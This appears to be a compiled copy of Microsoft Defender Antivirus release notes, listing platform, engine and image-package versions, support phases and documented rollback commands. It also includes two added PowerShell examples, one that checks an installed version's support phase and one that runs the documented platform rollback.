KB2267602.

Note

Updates are released under the following KBs:

Microsoft Defender Antivirus: KB2267602
System Center Endpoint Protection: KB2461484

Cloud-delivered protection is always on and requires an active connection to the
Internet to function. Security intelligence updates occur on a scheduled cadence
(configurable via policy). For more information, see Use Microsoft cloud-provided
protection in Microsoft Defender Antivirus.

For a list of recent security intelligence updates, see Security intelligence updates for
Microsoft Defender Antivirus and other Microsoft antimalware .

Engine updates are included with security intelligence updates and are released on a
monthly cadence.

Product updates
Microsoft Defender Antivirus requires monthly updates (KB4052623) known as platform
updates.

You can manage the distribution of updates through one of the following methods:

Windows Server Update Service (WSUS)
Microsoft Configuration Manager
The usual methods you use to deploy Microsoft and Windows updates to
endpoints in your network.

For more information, see Manage the sources for Microsoft Defender Antivirus
protection updates.

Important points about product updates

Monthly updates are released in phases, resulting in multiple packages visible in
your Windows Server Update Services.

This article lists changes that are included in the broad release channel. See the
latest broad channel release here.

To learn more about the gradual rollout process, and to see more information
about the next release, see Manage the gradual rollout process for Microsoft
Defender updates.

To learn more about security intelligence updates, see Security intelligence updates
for Microsoft Defender Antivirus and other Microsoft antimalware.

If you're looking for a list of Microsoft Defender processes, download the mde-urls
workbook, and then select the Microsoft Defender Processes worksheet.
The mde-urls workbook also lists the services and their associated URLs that your
network must be able to connect to, as described in Enable access to Microsoft
Defender for Endpoint service URLs in the proxy server.

Platform updates can be temporarily postponed if other protection features (such
as Endpoint DLP or Device Control) are actively monitoring running processes.
Platform updates are retried after a reboot or when all monitored services are
stopped.

In the Microsoft Endpoint Configuration Manager / Windows Server Update
Services (MECM/WSUS) catalog, the category Microsoft Defender for Endpoint
includes updates for the MSSense service in KB5005292. KB5005292 includes
updates and fixes to the Microsoft Defender for Endpoint endpoint detection and
response (EDR) sensor. For more information, see Microsoft Defender for Endpoint
update for EDR Sensor and What's new in Microsoft Defender for Endpoint on
Windows.

Monthly platform and engine versions

All our updates contain

Performance improvements
Serviceability improvements
Integration improvements (Cloud, Microsoft Defender XDR)

January-2024 (Platform: 4.18.24010.12 | Engine: 1.1.24010.10)
Security intelligence update version: 1.405.702.0
Release date: February 27, 2024
Platform: 4.18.24010.12
Engine: 1.1.24010.10
Support phase: Security and Critical Updates

What's new
Microsoft Defender Antivirus now caches the Mark of the Web (MoTW) Alternative
Data Stream (ADS) for better performance while scanning.
Fixed an issue that occurred in attack surface reduction in warn mode when
removing scan results from the real-time protection cache.
Performance improvement added for OneNote.exe.
Cloud-based entries are regularly removed from the persistent user mode cache in
Windows Defender to prevent an uncommon issue where a user could still add a
certificate, based on an Indicator of compromise (IoC), to the cache after a file with
that certificate had already been added via cloud signature.
The Sense onboarding event is now sent in passive mode for operating systems
with the old Sense client.
Improved performance for logs created/accessed by PowerShell.
Improved performance for folders included in Controlled folder access (CFA) when
accessing network files.
Fixed a deadlock that occurred at shutdown for Data Loss Prevention (DLP)
enabled devices.
Fixed an issue to remove a vulnerability in the Microsoft Defender Core service.
Fixed an onboarding issue in the Unified Agent installation script install.ps1.
Fixed a memory leak that impacted some devices that received platform update
4.18.24010.7.

November-2023 (Platform: 4.18.23110.3 | Engine: 1.1.23110.2)
Security intelligence update version: 1.403.7.0
Release date: December 5, 2023 (Platform) / December 6, 2023 (Engine)
Platform: 4.18.23110.3
Engine: 1.1.23110.2
Support phase: Security and Critical Updates

What's new
Fixed PowerShell cmdlet Get-MpComputerStatus to show the correct date/time for
AntivirusSignatureLastUpdated
Resolved deadlock issue that occurred on systems with multiple filter drivers
reading a file when the file is copied
Added the InitializationProgress field to Get-MpComputerStatus output
Fixed installation failure on Windows Server 2016 due to existing Defender
EventLog registry key
Added the ability to have quick scans ignore Microsoft Defender Antivirus
exclusions
Fixed remediation for long running on-demand scans where the service may have
been restarted
Fixed an issue with Microsoft Defender Vulnerability Management to allow the
execution of a blocked application when the warn option is selected
Added support for managing schedule day/time for signature updates in Intune
and Defender for Endpoint security settings management
Fixed non-standard signature path loading across platforms (Windows, Mac, Linux,
Android, and iOS)
Improved handling of cached detections in attack surface reduction capabilities
Improved performance for enumerating virtual memory ranges

Known issues

None

October-2023 (Platform: 4.18.23100.2009 | Engine: 1.1.23100.2009)
Security intelligence update version: 1.401.3.0
Release date: November 3, 2023 (Engine) / November 6, 2023 (Platform)
Platform: 4.18.23100.2009
Engine: 1.1.23100.2009
Support phase: Security and Critical Updates

What's new
Improved processing of environment variables in protected folders list for
controlled folder access
Improved performance of on-access scanning of files with Mark of the Web
(MoTW)
Added support for Active Directory device groups with device control
Fixed an issue so that ASROnlyPerRuleExclusions don't apply during an engine
reboot
Microsoft Defender Core service is generally available for consumer devices and is
coming soon for business customers.
Fixed an issue with device control so that device control policies remain enforced
when a platform update requires a reboot
Improved performance of device control for printing scenarios
Fixed truncation issue in the output of MpCmdRun.exe -scan (processing Unicode
characters)

Known issues

None

Previous version updates: Technical upgrade support only

After a new package version is released, support for the previous two versions is
reduced to technical support only. For more information about previous versions, see
Microsoft Defender Antivirus updates: Previous versions for technical upgrade support.

Microsoft Defender Antivirus platform support

Platform and engine updates are provided on a monthly cadence. To be fully supported,
keep current with the latest platform updates. Our support structure is dynamic,
evolving into two phases depending on the availability of the latest platform version:

Security and Critical Updates servicing phase - When running the latest platform
version, you're eligible to receive both Security and Critical updates to the
anti-malware platform.

Technical Support (Only) phase - After a new platform version is released, support
for older versions (N-2) reduces to technical support only. Platform versions older
than N-2 are no longer supported. Technical support continues to be provided for
upgrades from the Windows 10 release version (see Platform version included with
Windows 10 releases) to the latest platform version.

During the technical support (only) phase, commercially reasonable support incidents
are provided through Microsoft Customer Service & Support and Microsoft's managed
support offerings (such as Premier Support). If a support incident requires escalation to
development for further guidance, requires a nonsecurity update, or requires a security
update, customers are asked to upgrade to the latest platform version or an
intermediate update (*).

Note

If you are manually deploying Microsoft Defender Antivirus Platform Update, or if
you are using a script or a non-Microsoft management product to deploy Microsoft
Defender Antivirus Platform Update, make sure that version 4.18.2001.10 is
installed from the Microsoft Update Catalog before the latest version of
Platform Update (N-2) is installed.
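The N / N-2 rule above turned into a check you can run against a device, as an added example that is not part of the Microsoft article. The version lists are transcribed from this page (the monthly platform versions from January-2024 back to July-2023, the Windows 10 inbox platform versions, and the 4.18.2001.10 prerequisite from the Note), so they go stale as new platform versions ship and must be refreshed from the current article. The classification mirrors the support phases shown on this page: the three newest listed versions are in the Security and Critical Updates phase, older ones in Technical upgrade support (only). Function and variable names are the example's own.

```powershell
# Added example (not from the Microsoft article): classify an installed
# Microsoft Defender Antivirus platform version against the support phases
# described above. Version lists transcribed from the article (02/27/2024
# revision); refresh them before relying on the result.

# Monthly platform versions, newest first.
$MonthlyPlatformVersions = @(
    '4.18.24010.12',   # January-2024  (N, latest)
    '4.18.23110.3',    # November-2023 (N-1)
    '4.18.23100.2009', # October-2023  (N-2)
    '4.18.23090.2008', # September-2023
    '4.18.23080.2006', # August-2023
    '4.18.23070.1004'  # July-2023
) | ForEach-Object { [version]$_ }

# Platform versions that ship inbox with Windows 10 releases (and Server 2016/2019).
$InboxPlatformVersions = @(
    '4.18.1909.6', '4.18.1902.5', '4.18.1807.5', '4.13.17134.1',
    '4.12.16299.15', '4.11.15603.2', '4.10.14393.3683'
) | ForEach-Object { [version]$_ }

# Version that must be installed first when deploying the platform update
# manually or with a non-Microsoft tool (from the Note above).
$ManualDeployPrerequisite = [version]'4.18.2001.10'

function Get-DefenderPlatformSupportPhase {
    param(
        [Parameter(Mandatory)][version]$InstalledVersion,
        [version[]]$MonthlyVersions = $MonthlyPlatformVersions
    )

    $sorted = $MonthlyVersions | Sort-Object -Descending
    $latest = $sorted[0]

    # How many listed monthly releases are newer than the installed version?
    # This also handles interim builds that are not in the list themselves.
    $newer = @($sorted | Where-Object { $_ -gt $InstalledVersion }).Count

    $phase = if ($InstalledVersion -gt $latest) { 'Newer than this list; refresh the version table' }
             elseif ($newer -le 2)              { 'Security and Critical Updates' }
             else                               { 'Technical upgrade support (only)' }

    [pscustomobject]@{
        InstalledVersion    = $InstalledVersion
        LatestListedVersion = $latest
        ReleasesBehind      = $newer
        SupportPhase        = $phase
        IsInboxVersion      = $InstalledVersion -in $InboxPlatformVersions
        NeedsPrerequisite   = $InstalledVersion -lt $ManualDeployPrerequisite
    }
}

# Constructed sample inputs, one per outcome:
'4.18.24010.12', '4.18.23100.2009', '4.18.23090.2008', '4.18.1909.6' |
    ForEach-Object { Get-DefenderPlatformSupportPhase -InstalledVersion $_ } |
    Format-Table -AutoSize

# On a live device (requires the built-in Defender module):
# Get-DefenderPlatformSupportPhase -InstalledVersion (Get-MpComputerStatus).AMProductVersion
```

With the lists as transcribed, 4.18.23100.2009 is two releases behind and still in the Security and Critical Updates phase, 4.18.23090.2008 is three behind and drops to technical upgrade support, and 4.18.1909.6 is reported as an inbox version that is also below the 4.18.2001.10 prerequisite for manual deployment.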

How to roll back an update

In the unfortunate event that you encounter issues after a platform update, you can roll
back to the previous or the inbox version of the Microsoft Defender platform.

To roll back to the previous version, run the following command:

"%programdata%\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe" -RevertPlatform

To roll back this update to the version shipped with the operating system
("%ProgramFiles%\Windows Defender"), run the following command:

"%programdata%\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe" -ResetPlatform
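The two rollback commands above with the <version> placeholder resolved automatically, as an added example that is not part of the Microsoft article. It assumes only the folder layout the commands themselves show (%programdata%\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe), picks the highest version folder as the current one, records the platform version before and after, and supports -WhatIf so the exact command can be reviewed before anything changes. The function names are the example's own. Run it elevated.

```powershell
# Added example (not from the Microsoft article): locate the current platform
# folder and run MpCmdRun.exe with -RevertPlatform or -ResetPlatform.

$PlatformRoot = Join-Path $env:ProgramData 'Microsoft\Windows Defender\Platform'

function Get-DefenderPlatformFolders {
    # One folder per installed platform version, newest first.
    Get-ChildItem -Path $PlatformRoot -Directory -ErrorAction Stop |
        Where-Object { $_.Name -as [version] } |
        Sort-Object -Property @{ Expression = { [version]$_.Name } } -Descending
}

function Invoke-DefenderPlatformRollback {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        # RevertPlatform: go back to the previous platform version.
        # ResetPlatform:  go back to the version shipped with the operating system.
        [ValidateSet('RevertPlatform', 'ResetPlatform')]
        [string]$Action = 'RevertPlatform'
    )

    $current = Get-DefenderPlatformFolders | Select-Object -First 1
    if (-not $current) { throw "No platform folders found under $PlatformRoot" }

    $mpCmdRun = Join-Path $current.FullName 'MpCmdRun.exe'
    if (-not (Test-Path -Path $mpCmdRun)) { throw "MpCmdRun.exe not found in $($current.FullName)" }

    $before = (Get-MpComputerStatus).AMProductVersion

    if ($PSCmdlet.ShouldProcess("$mpCmdRun -$Action", 'Roll back Microsoft Defender platform')) {
        & $mpCmdRun "-$Action"
        $exitCode = $LASTEXITCODE
        $after = (Get-MpComputerStatus).AMProductVersion

        [pscustomobject]@{
            Command       = "$mpCmdRun -$Action"
            ExitCode      = $exitCode
            VersionBefore = $before
            VersionAfter  = $after
        }
    }
}

# Preview the command first; remove -WhatIf to perform the rollback.
Invoke-DefenderPlatformRollback -Action RevertPlatform -WhatIf
```

Keep the object the function returns: a rollback is the kind of change an incident reviewer will want to see with the exact executable path, exit code and before/after versions.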

Platform version included with Windows 10 releases

The below table provides the Microsoft Defender Antivirus platform and engine versions
that are shipped with the latest Windows 10 releases:

| Windows 10 release | Platform version | Engine version | Support phase |
|---|---|---|---|
| 2004 (20H1/20H2) | 4.18.1909.6 | 1.1.17000.2 | Technical upgrade support (only) |
| 1909 (19H2) | 4.18.1902.5 | 1.1.16700.3 | Technical upgrade support (only) |
| 1903 (19H1) | 4.18.1902.5 | 1.1.15600.4 | Technical upgrade support (only) |
| 1809 (RS5) | 4.18.1807.5 | 1.1.15000.2 | Technical upgrade support (only) |
| 1803 (RS4) | 4.13.17134.1 | 1.1.14600.4 | Technical upgrade support (only) |
| 1709 (RS3) | 4.12.16299.15 | 1.1.14104.0 | Technical upgrade support (only) |
| 1703 (RS2) | 4.11.15603.2 | 1.1.13504.0 | Technical upgrade support (only) |
| 1607 (RS1) | 4.10.14393.3683 | 1.1.12805.0 | Technical upgrade support (only) |

For Windows 10 release information, see the Windows lifecycle fact sheet .

Note

Windows Server 2016 ships with the same Platform version as RS1 and falls under
the same support phase: Technical upgrade support (only)
Windows Server 2019 ships with the same Platform version as RS5 and falls under
the same support phase: Technical upgrade support (only)

Updates for Deployment Image Servicing and Management (DISM)

To avoid a gap in protection, keep your OS installation images up to date with the latest
antivirus and antimalware updates. Updates are available for:

Windows 10 and 11 (Enterprise, Pro, and Home editions)
Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows
Server 2012 R2
WIM and VHD(x) files

Updates are released for x86, x64, and ARM64 Windows architecture.

For more information, see Microsoft Defender update for Windows operating system
installation images .

20230809.1
Defender package version: 20230809.1
Security intelligence version: 1.395.68.0
Engine version: 1.1.23070.1005
Platform version: 4.18.23070.1004
Fixes
None

20230604.1
Defender package version: 20230604.1
Security intelligence version: 1.391.476.0
Engine version: 1.1.23050.3
Platform version: 4.18.23050.3

Fixes

None

20230503.1
Defender package version: 20230503.1
Security intelligence version: 1.389.44.0
Engine version: 1.1.20300.3
Platform version: 4.18.2304.8

Fixes
None

Additional information
None

20230330.2
Defender package version: 20230330.2
Security intelligence version: 1.385.1537.0
Engine version: 1.1.20100.6
Platform version: 4.18.2302.7

Fixes

None
Additional information
None

20230308.1
Defender package version: 20230308.1
Security intelligence version: 1.383.1321.0
Engine version: 1.1.20000.2
Platform version: 4.18.2301.6

Fixes

None

Additional information

None

20230215.1
Defender package version: 20230215.1
Security intelligence version: 1.383.51.0
Engine version: 1.1.20000.2
Platform version: 4.18.2301.6

Fixes
None

Additional information
None

20230118.1
Defender package version: 20230118.1
Security intelligence version: 1.381.2404.0
Engine version: 1.1.19900.2
Platform version: 4.18.2211.5
Fixes
None

Additional information

None

20221209.1
Defender package version: 20221209.1
Security intelligence version: 1.381.144.0
Engine version: 1.1.19900.2
Platform version: 4.18.2211.5

Fixes

None

Additional information
None

20221102.3
Defender package version: 20221102.3
Security intelligence version: 1.377.1180.0
Engine version: 1.1.19700.3
Platform version: 4.18.2210.4

Fixes
None

Additional information
None

20221014.1
Package version: 20221014.1
Platform version: 4.18.2209.7
Engine version: 1.1.19700.3
Signature version: 1.373.208.0

Fixes

None

Additional information

None

20220929.1
Package version: 20220929.1
Platform version: 4.18.2207.7
Engine version: 1.1.19600.3
Signature version: 1.373.1243.0

Fixes
None

Additional information
None

20220925.2
Package version: 20220925.2
Platform version: 4.18.2207.7
Engine version: 1.1.19600.3
Signature version: 1.373.1371.0

Fixes

None

Additional information
None

20220901.4
Package version: 20220901.4
Platform version: 4.18.2205.7
Engine version: 1.1.19500.2
Signature version: 1.373.1371.0

Fixes
None

Additional information
None

20220802.1
Package version: 20220802.1
Platform version: 4.18.2205.7
Engine version: 1.1.19400.3
Signature version: 1.371.1205.0

Fixes

None

Additional information

None

20220629.5
Package version: 20220629.5
Platform version: 4.18.2205.7
Engine version: 1.1.19300.2
Signature version: 1.369.220.0

Fixes
None

Additional information
None

20220603.3
Package version: 20220603.3
Platform version: 4.18.2203.5
Engine version: 1.1.19200.6
Signature version: 1.367.1009.0

Fixes
None

Additional information

None

20220506.6
Package version: 20220506.6
Platform version: 4.18.2203.5
Engine version: 1.1.19200.5
Signature version: 1.363.1436.0

Fixes

None

Additional information

None

20220321.1
Package version: 20220321.1
Platform version: 4.18.2202.4
Engine version: 1.1.19000.8
Signature version: 1.351.337.0

Fixes

None

Additional information

None

20220305.1
Package version: 20220305.1
Platform version: 4.18.2201.10
Engine version: 1.1.18900.3
Signature version: 1.359.1405.0

Fixes
None

Additional information
None

20220203.1
Package version: 20220203.1
Platform version: 4.18.2111.5
Engine version: 1.1.18900.2
Signature version: 1.357.32.0

Fixes

None

Additional information

None

20220105.1
Package version: 20220105.1
Platform version: 4.18.2111.5
Engine version: 1.1.18800.4
Signature version: 1.355.1482.0

Fixes

None

Additional information

None

1.1.2112.01
Package version: 1.1.2112.01
Platform version: 4.18.2110.6
Engine version: 1.1.18700.4
Signature version: 1.353.2283.0

Fixes
None

Additional information
None

1.1.2111.02
Package version: 1.1.2111.02
Platform version: 4.18.2110.6
Engine version: 1.1.18700.4
Signature version: 1.353.613.0

Fixes

Fixed an issue pertaining to localization files

Additional information
None

1.1.2110.01
Package version: 1.1.2110.01
Platform version: 4.18.2109.6
Engine version: 1.1.18500.10
Signature version: 1.349.2103.0

Fixes

None

Additional information

None

1.1.2109.01
Package version: 1.1.2109.01
Platform version: 4.18.2107.4
Engine version: 1.1.18400.5
Signature version: 1.347.891.0

Fixes
None

Additional information
None

1.1.2108.01
Package version: 1.1.2108.01
Platform version: 4.18.2107.4
Engine version: 1.1.18300.4
Signature version: 1.343.2244.0

Fixes
None

Additional information

None

1.1.2107.02
Package version: 1.1.2107.02
Platform version: 4.18.2105.5
Engine version: 1.1.18300.4
Signature version: 1.343.658.0

Fixes

None

Additional information
None

1.1.2106.01
Package version: 1.1.2106.01
Platform version: 4.18.2104.14
Engine version: 1.1.18100.6
Signature version: 1.339.1923.0

Fixes
None

Additional information
None

1.1.2105.01
Package version: 1.1.2105.01
Platform version: 4.18.2103.7
Engine version: 1.1.18100.6
Signature version: 1.339.42.0

Fixes

None

Additional information

None

1.1.2104.01
Package version: 1.1.2104.01
Platform version: 4.18.2102.4
Engine version: 1.1.18000.5
Signature version: 1.335.232.0

Fixes
None

Additional information
None

1.1.2103.01
Package version: 1.1.2103.01
Platform version: 4.18.2101.9
Engine version: 1.1.17800.5
Signature version: 1.331.2302.0

Fixes

None

Additional information
None

1.1.2102.03
Package version: 1.1.2102.03
Platform version: 4.18.2011.6
Engine version: 1.1.17800.5
Signature version: 1.331.174.0

Fixes
None

Additional information
None

1.1.2101.02
Package version: 1.1.2101.02
Platform version: 4.18.2011.6
Engine version: 1.1.17700.4
Signature version: 1.329.1796.0

Fixes

None

Additional information

None

1.1.2012.01
Package version: 1.1.2012.01
Platform version: 4.18.2010.7
Engine version: 1.1.17600.5
Signature version: 1.327.1991.0

Fixes
None

Additional information
None

1.1.2011.02
Package version: 1.1.2011.02
Platform version: 4.18.2010.7
Engine version: 1.1.17600.5
Signature version: 1.327.658.0

Fixes
None

Additional information

Refreshed Microsoft Defender Antivirus signatures

1.1.2011.01
Package version: 1.1.2011.01
Platform version: 4.18.2009.7
Engine version: 1.1.17600.5
Signature version: 1.327.344.0

Fixes

None

Additional information

None

1.1.2009.10
Package version: 1.1.2011.01
Platform version: 4.18.2008.9
Engine version: 1.1.17400.5
Signature version: 1.327.2216.0

Fixes

None

Additional information

Added support for Windows 10 RS1 or later OS install images.

More resources

| Article | Description |
|---|---|
| Microsoft Defender update for Windows operating system installation images | Review antimalware update packages for your OS installation images (WIM and VHD files). Get Microsoft Defender Antivirus updates for Windows 10 (Enterprise, Pro, and Home editions), Windows Server 2019, Windows Server 2022, Windows Server 2016, and Windows Server 2012 R2 installation images. |
| Manage how protection updates are downloaded and applied | Protection updates can be delivered through many sources. |
| Manage when protection updates should be downloaded and applied | You can schedule when protection updates should be downloaded. |
| Manage updates for endpoints that are out of date | If an endpoint misses an update or scheduled scan, you can force an update or scan the next time a user signs in. |
| Manage event-based forced updates | You can set protection updates to be downloaded at startup or after certain cloud-delivered protection events. |
| Manage updates for mobile devices and virtual machines (VMs) | You can specify settings, such as whether updates should occur on battery power, that's especially useful for mobile devices and virtual machines. |
| Microsoft Defender for Endpoint update for EDR Sensor | You can update the EDR sensor (MsSense.exe) that's included in the new Microsoft Defender for Endpoint unified solution package released in 2021. |

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Microsoft Defender Antivirus updates - Previous versions for technical upgrade support only
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Microsoft regularly releases security intelligence updates and product updates for
Microsoft Defender Antivirus. It's important to keep Microsoft Defender Antivirus up to
date. When a new package version is released, support for the previous two versions is
reduced to technical support only. Versions that are older than the previous two
versions are listed in this article and are provided for technical upgrade support only.

September-2023 (Platform: 4.18.23090.2008 | Engine: 1.1.23090.2007)
Security intelligence update version: 1.399.44.0
Release date: October 3, 2023 (Engine) | October 4, 2023 (Platform)
Platform: 4.18.23090.2008
Engine: 1.1.23090.2007
Support phase: Technical upgrade support (only)

What's new
Fixed automatic remediation during on demand scans involving archives with
multiple threats
Improved the performance of scanning files on network locations
Added support for domain computer SID for device control policies
Improved installer of unified agent to include legacy version of Windows Server
2012 (6.3.9600.17735)
Fixed issue in device control when querying Microsoft Entra group membership,
which resulted in increased network traffic.
Improved parsing of attack surface reduction exclusions in the antimalware engine
Improved reliability in scanning PE files
Improved deployment safeguards for security intelligence updates

Known issues
None

August-2023 (Platform: 4.18.23080.2006 | Engine: 1.1.23080.2005)
Security intelligence update version: 1.397.59.0
Released: August 30, 2023 (Platform and Engine)
Platform: 4.18.23080.2006
Engine: 1.1.23080.2005
Support phase: Technical upgrade support (only)

What's new
Fixed an issue where Microsoft Defender Antivirus switched from passive mode to
active mode following an update on Windows Server 2016 and Windows Server
2012 R2 onboarded using the modern, unified client
Fixed an issue where exclusions weren't applied correctly using gpupdate when
registry policy processing was set to process even if Group Policy Objects didn't
change
Excluded IP addresses can now be configured using Intune
Improved tamper protection on Windows Server 2016
DisableFtpParsing can now be configured through Set-MpPreference
Fixed an issue where device control policies weren't applied correctly without a
reboot following product updates
Fixed an issue in the attack surface reduction rule, Block Win32 API calls from
Office macros, configured in warn mode where excluded files were incorrectly
blocked until the next device reboot

Known issues
None

July-2023 (Platform: 4.18.23070.1004 | Engine: 1.1.23070.1005)
Security intelligence update version: 1.395.30.0
Released: August 9, 2023 (Engine and Platform)
Platform: 4.18.23070.1004
Engine: 1.1.23070.1005
Support phase: Technical upgrade support (only)

What's new
Improved output for Get-MpComputerStatus if scan results fail to retrieve
Extended management options for configuring security intelligence updates with
Intune, Group Policy, and PowerShell
Extended management options for disabling IOAV scans over the network using
Intune, Group Policy, and PowerShell. The new setting is
ApplyDisableNetworkScanningToIOAV for Set-MpPreference.

Improved the Unified agent installation process to handle MsMpEng.exe debugger
extensions, if present
Fixed an issue pertaining to showing the exclusions list with PowerShell
Get-MpPreference on systems managed by Intune
Fixed warn notifications for two attack surface reduction rules (Block Office
applications from injecting code into other processes and Block credential stealing
from the Windows local security authority subsystem)
Fixed an issue with running Update-MpSignature -UpdateSource:MMPC when using a
nonelevated PowerShell console (see Update-MpSignature)
Fixed an issue with ASR rules deployed via Intune to display accurately in the
Microsoft Defender portal
Fixed tamper protection management for customers who have Microsoft 365 E3 or
Defender for Endpoint Plan 1
Improved installation and uninstallation logic on Server SKUs using the modern,
unified agent (see Defender for Endpoint onboarding Windows Server)
Fixed an issue where AntivirusSignatureLastUpdated was incorrect when executing
Get-MpComputerStatus
Addressed a deadlock caused by Microsoft Defender Antivirus in rare cases
Added ProcessId to ASR Warn exclusion events (see ASR rules configuration
summary card)
Fixed an issue where values specified in ThreatSeverityDefaultAction weren't
honored intermittently
Improved error reporting in the modern, unified agent installer
Fixed the overriding logic in the ASR rule Block all Office applications from creating
child processes configured in warn mode
Added support for scanning Zstandard (Zstd) containers/archives

Known issues
None

May-2023 UPDATE (Platform: 4.18.23050.9)

Microsoft has released a platform update (4.18.23050.9) for the May 2023 release.

Security intelligence update version: 1.393.1315.0
Released: July 24, 2023 (Platform only)
Platform: 4.18.23050.9
Engine: 1.1.23060.1005
Support phase: Technical upgrade support (only)

What's new
Fixed a regression where HTTP requests were being handled sequentially, causing
high latency for network protection scenarios
Fixed a bug where DNS requests with empty authority records were being
improperly parsed

June-2023 (Engine: 1.1.23060.1005)

Security intelligence update version: 1.393.71.0
Released: July 10, 2023 (Engine only)
Engine: 1.1.23060.1005
Support phase: Technical upgrade support (only)

What's new
Fixed an issue with ASR rules deployed via Intune to display accurately in the
Microsoft Defender portal
Fixed a performance issue when building and validating the Microsoft Defender
Antivirus cache
Improved performance by removing redundant exclusion checks

Known Issues
See May-2023 UPDATE (Platform: 4.18.23050.9 | Engine: 1.1.23060.1005) for
platform updates.

May-2023 UPDATE (Platform: 4.18.23050.5 | Engine: 1.1.23050.2)
Microsoft released a platform update (4.18.23050.5) for the May 2023 release, followed by
an additional update.

Security intelligence update version: 1.391.860.0
Released: June 12, 2023
Platform: 4.18.23050.5
Engine: 1.1.23050.2
Support phase: Technical upgrade support (only)

What's new
Fixed issue that could lead to resolution of incorrect service endpoint

Known Issues
Users encounter slow loading webpages in non-Microsoft web browsers with web
content filtering enabled

May-2023 (Platform: 4.18.23050.3 | Engine: 1.1.23050.2)
Security intelligence update version: 1.391.64.0
Released: May 31, 2023
Platform: 4.18.23050.3
Engine: 1.1.23050.2
Support phase: Technical upgrade support (only)

What's new
New version format for Platform and Engine (see the April-2023 update)
Improved processing of SmartLockerMode
Fixed input parameters for DefinitionUpdateChannel cmdlet in Set-MpPreference
Improved installation experience for Windows Server 2012 R2 and Windows Server
2016
Added ability to disable Defender task maintenance tasks programmatically
Fixed WDFilter 0x50 bug check
Fixed print enforcement issue for device control
Fixed scan randomization issue when setting Intune policy
Fixed sense offboarding on Windows Server 2016 when tamper protection is
enabled
Fixed inconsistent results of caching files with the internal Defender file cache
Augmented attack surface reduction telemetry with more data related to an ASR
detection
Removed Image File Execution Options (IFEO) debugger value during installation,
which can be used to prevent service starts
Fixed memory leak in ASR logic
Improved validation guard-rail for Malicious Software Removal Tool (MSRT)
releases

Known Issues
Potential issue that could lead to resolution of incorrect service endpoint

April-2023 (Platform: 4.18.2304.8 | Engine: 1.1.20300.3)
Security intelligence update version: 1.387.2997.0
Release date: May 2, 2023 (Engine) / May 2, 2023 (Platform)
Platform: 4.18.2304.8
Engine: 1.1.20300.3
Support phase: Technical upgrade support (only)

What's new
Beginning in May 2023, the Platform and Engine version schemas have a new
format. Here's what the new version format looks like:
Platform: 4.18.23050.1
Engine: 1.1.23050.63000
Fixed memory leak in behavior monitoring
Improved resiliency of signature loading and platform updates
Quarantine and restore support for WMI
Fixed attack surface reduction rule output with Get-MpPreference
Fixed MSERT to only use release engine version
Improved the enforcement of exclusions
Added support for enabling real-time protection and signature updates during
OOBE
Fixed localization for Defender events
Deprecated real-time signature delivery setting
Updated missing setting (ValidateMapsConnection) in MpCmdRun.exe
Fixed abandoned threats in the Windows Security app
Fixed a service-hang issue that caused invalid outputs to display in
Get-MpComputerStatus

Known issues
None

March-2023 (Platform: 4.18.2303.8 | Engine: 1.1.20200.4)
Security intelligence update version: 1.387.695.0
Release date: April 4, 2023 (Engine) / April 11, 2023 (Platform)
Platform: 4.18.2303.8
Engine: 1.1.20200.4
Support phase: Technical upgrade support (only)

What's new
Beginning in April 2023, monthly platform and engine version release information
(in this article) now includes two dates: Engine and Platform
Increased file hash support
Added support to protect registry keys against parent keys abuse
Improved tamper protection of registry keys against parent keys abuse
Improved log handling for DLP and Device Control
Improved performance on developer drives

Known issues
None

February-2023 (Platform: 4.18.2302.7 | Engine: 1.1.20100.6)
Security intelligence update version: 1.385.68.0
Release date: March 27, 2023
Platform: 4.18.2302.7
Engine: 1.1.20100.6
Support phase: Technical upgrade support (only)

What's new
Fixed attack surface reduction rule output with Get-MpPreference
Fixed threat DefaultAction outputs in Get-MpPreference
Improved Defender performance during file copy operations for .NET applications
Fixed Microsoft Defender Vulnerability Management app block warn feature
Added opt-in feature to allow users seeing exclusions
Fixed ASR warn policy
Increased maximum size for quarantine archive file to 4 GB
Improvements to threat remediation logic
Improved tamper protection hardening for temporary exclusions
Fixed time zone calculation in Defender PowerShell module
Fixed merging logic for exclusions in Defender PowerShell module
Improvements in the contextual exclusions syntax
Improved scheduled scan robustness
Improved serviceability for internal database files
Enhanced certificate indicators determination logic
Enhanced memory usage

Known Issues
None

January-2023 (Platform: 4.18.2301.6 | Engine: 1.1.20000.2)
Security intelligence update version: 1.383.26.0
Release date: February 14, 2023
Platform: 4.18.2301.6
Engine: 1.1.20000.2
Support phase: Technical upgrade support (only)

What's new
Improved ASR rule processing logic
Updated Sense token hardening
Improved Defender CSP module update channel logic

Known Issues
None

November-2022 (Platform: 4.18.2211.5 | Engine: 1.1.19900.2)
Security intelligence update version: 1.381.144.0
Release date: December 8, 2022
Platform: 4.18.2211.5
Engine: 1.1.19900.2
Support phase: Technical upgrade support (only)

What's new
Enhanced threat protection capabilities
Improved tamper protection capabilities
Enhanced enabling of tamper protection for newly onboarded devices
Improved reporting for cloud protection
Improved controlled folder access notifications
Improved scanning of network shares
Enhanced processing of host files containing a wild card
Improved performance for scan events

Known Issues
None

October-2022 (Platform: 4.18.2210.6 | Engine: 1.1.19800.4)
Security intelligence update version: 1.379.4.0
Release date: November 10, 2022
Platform: 4.18.2210.6
Engine: 1.1.19800.4
Support phase: Technical upgrade support (only)

What's new
Addressed a quality issue that could result in poor responsiveness/usability
Improved hang detection in antivirus engine
Improved tamper protection capability
Changed threat & vulnerability management (TVM)-warn and TVM-block action to
block to resolve Intune's report
Removed Clean Action from Intune policy for ThreatSeverityDefaultAction
Added randomize scheduled task times configuration to Intune policy
Added manageability for DisableSMTPParsing network protection
Added improvement for behavior monitoring
Normalized date format for event 1151 for Windows Defender
